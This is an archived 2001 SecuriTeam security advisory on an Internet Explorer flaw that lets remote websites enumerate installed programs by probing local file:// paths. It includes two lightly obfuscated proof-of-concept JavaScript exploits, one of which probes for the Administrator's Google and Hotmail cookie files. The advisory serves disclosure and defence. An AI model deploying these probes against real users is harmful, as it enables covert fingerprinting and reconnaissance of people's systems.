[NT] Internet Explorer System Information Disclosure

From: support@securiteam.com
Date: 11/06/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Internet Explorer System Information Disclosure
Message-Id: <20011106160348.C1697138C0@mail.der-keiler.de>
Date: Tue,  6 Nov 2001 17:03:48 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Internet Explorer System Information Disclosure
------------------------------------------------------------------------

SUMMARY

A security vulnerability in the Internet Explorer product allows remote
sites to enumerate which programs are currently installed on the user's
computer by asking to access them via a file:// request and monitoring the
returned error code.

DETAILS

Exploit:
(note: all occurrences of 'i' were replaced with '!')

Example 1:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>
<scr!pt>

if(!document.all){alert('Ughh this is IE5+ specific')}

head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0
cellSpacing=0 width="95%"><TBODY>'

htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
        '<div align=left><font size=+2 color="ffffff" face="Verdana,
Arial,Helvetica, sans-serif"><b>-' +
        '</b></font></div></TD><TD height=3 width=40%
align=center>--</TD></TR>'

tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500
width="100%"></iframe>'

function yup(x) { img[x]+=',<img src="y.jpg">' }
function nope(x) { img[x]+=',<img src="x.jpg">' }

img=new Array
img[1]="LogicTech Cam,C:\\Program
Files\\Logitech\\QuickCam\\Samples\\Henry.jpg"
img[2]="Icq,C:\\Program Files\\ICQ\\Help\\HelpCards\\images\\bg.gif"
img[3]="Interdev,C:\\Program Files\\Microsoft Visual
Studio\\VIntDev98\\Samples\\Gallery\\content\\images\\CLOUDS.JPG"
img[4]="VisualC,C:\\Program Files\\Microsoft Visual
Studio\\VC98\\MFC\\Include\\Res\\TRUETYPE.BMP"
img[5]="WinAce,C:\\Program Files\\WinAce\\html\\images\\tip1.gif"
img[6]="Acrobat Reader4,C:\\Program Files\\Adobe\\Acrobat
4.0\\Reader\\plug_ins\\WEBBUY\\HTML\\table_btm.gif"
img[7]="Adobe PageMaker,C:\\Program
Files\\Adobe\\PM65\\RSRC\\USENGLSH\\PLUGINS\\HTMLEXP.GIF"
img[8]="MS Office,C:\\Program Files\\Microsoft
Office\\Office\\Bitmaps\\Dbwiz\\BOOKS.GIF"
img[9]="Delphi6,C:\\Program Files\\Borland\\Delphi6\\BORLAND.GIF"
img[10]="Visual Basic 6,C:\\Program Files\\Microsoft Visual
Studio\\VB98\\Wizards\\PDWizard\\Setup1\\INSTALL.BMP"
img[11]="IIS,C:\\Inetpub\\iissamples\\sdk\\asp\\components\\ie.gif"

n=1

function cycle(){
   
   if(n < img.length){
      dat=img[n].split(",")
      img[n]=dat[0]
      it = "<img src='file://" + dat[1]+ "' onload=\"parent.yup("+ n +
")\" onerror=\"parent.nope(" + n + ")\">"
      ifrm.document.write(it)
      document.all.timer.innerText = img.length -n
      n=n+1
      setTimeout("cycle();",1000)
   }else{
      tbl=' '
      for(i=1;i<img.length;i++){
        tmp=img[i].split(",")
        tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
      }
      document.write(head+tbl+tail)
   }
}

cycle()
 
</script>

Example 2:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>

<scr!pt>

if(!document.all){alert('Ughh this is IE5+ specific')}

head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0
cellSpacing=0 width="95%"><TBODY>'

htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
        '<div align=left><font size=+2 color="ffffff" face="Verdana,
Arial,Helvetica, sans-serif"><b>-' +
        '</b></font></div></TD><TD height=3 width=40%
align=center>--</TD></TR>'

tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500
width="100%"></iframe>'

function yup(x) { img[x]+=',<img src="y.jpg">' }
function nope(x) { img[x]+=',<img src="x.jpg">' }
function test() { alert('hey there'+n) }

img=new Array
img[1]="Norton Anti V NT,C:\\Program Files\\Navnt\\end-user.txt"
img[2]="Norton AntiV 98,C:\\Program Files\\Norton AntiVirus\\end-user.txt"
img[3]="CygWin,C:\\cygwin\\usr\\doc\\lynx\\test\\README.txt"
img[4]="NT-Admin(google cookie),C:\\Documents and
Settings\\Administrator\\Cookies\\administrator@google[1].txt"
img[5]="NT-Admin(hotmail cookie),c:\\Documents and
Settings\\Administrator\\Cookies\\administrator@hotmail.msn[1].txt"
img[6]="Real Player,C:\\Program Files\\RealPlayer\\channels.xml"
img[7]="Eudora 3.x,C:\\Eudora\\Readme.txt"
img[8]="Masm,C:\\masm32\\LICENCE\\SDK_EULA.TXT"
img[9]="Php,C:\\PHP\\install.txt"
img[10]="Perl,C:\\Perl\\html\\EULA-Community_License.txt"

n=1

function cycle(){
   
   if(n < img.length){
      dat=img[n].split(",")
      img[n]=dat[0]
      it = "<iframe src='file://" + dat[1]+ "' onload=\"parent.yup("+ n +
")\">" //onerror='test()'>"
      ifrm.document.write(it)
      document.all.timer.innerText = img.length -n
      n=n+1
      setTimeout("cycle();",1000)
   }else{
      tbl=' '
      for(i=1;i<img.length;i++){
        if(img[i].indexOf('src=') < 1){ nope(i) }
        tmp=img[i].split(",")
        tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
      }
      document.write(head+tbl+tail)
   }
}

cycle()
 
</script>

ADDITIONAL INFORMATION

The information has been provided by <mailto:dzzie@yahoo.com> dzzie.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • Re: SPES (my new encryption) one of its kind
    ... system have, if exist weak keys and short cycle, if exist in known math ... shortcircuit with repeated output the security is totally broken ... and we have to do some designs that is nightmare to prove secure ... ... Faster computers will not resolve an operation proven to be not ...
    (sci.crypt)
  • [NT] Microsoft Agent Remote Code Execution (MS07-020)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... Outlook Express open HTML e-mail messages in the Restricted sites zone. ... section for more information about Internet Explorer Enhanced Security ...
    (Securiteam)
  • [NT] Vulnerability in Microsoft Agent Allows Code Execution (MS06-068)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... for more information about Internet Explorer Enhanced Security ... Configure Internet Explorer to prompt before running ActiveX Controls ...
    (Securiteam)
  • [NT] Vulnerability in Microsofts HTML Converter Could Allow Code Execution
    ... Beyond Security in Canada ... to promote the most advanced vulnerability assessment solutions today. ... Internet Explorer on Windows Server 2003 runs in Enhanced ... all intranet Web sites and all Universal Naming Convention paths ...
    (Securiteam)
  • [NT] Vulnerability in Visual Studio 2005 Could Allow Remote Code Execution (MS06-073)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... allow-list for ActiveX controls in Internet Explorer 7. ...
    (Securiteam)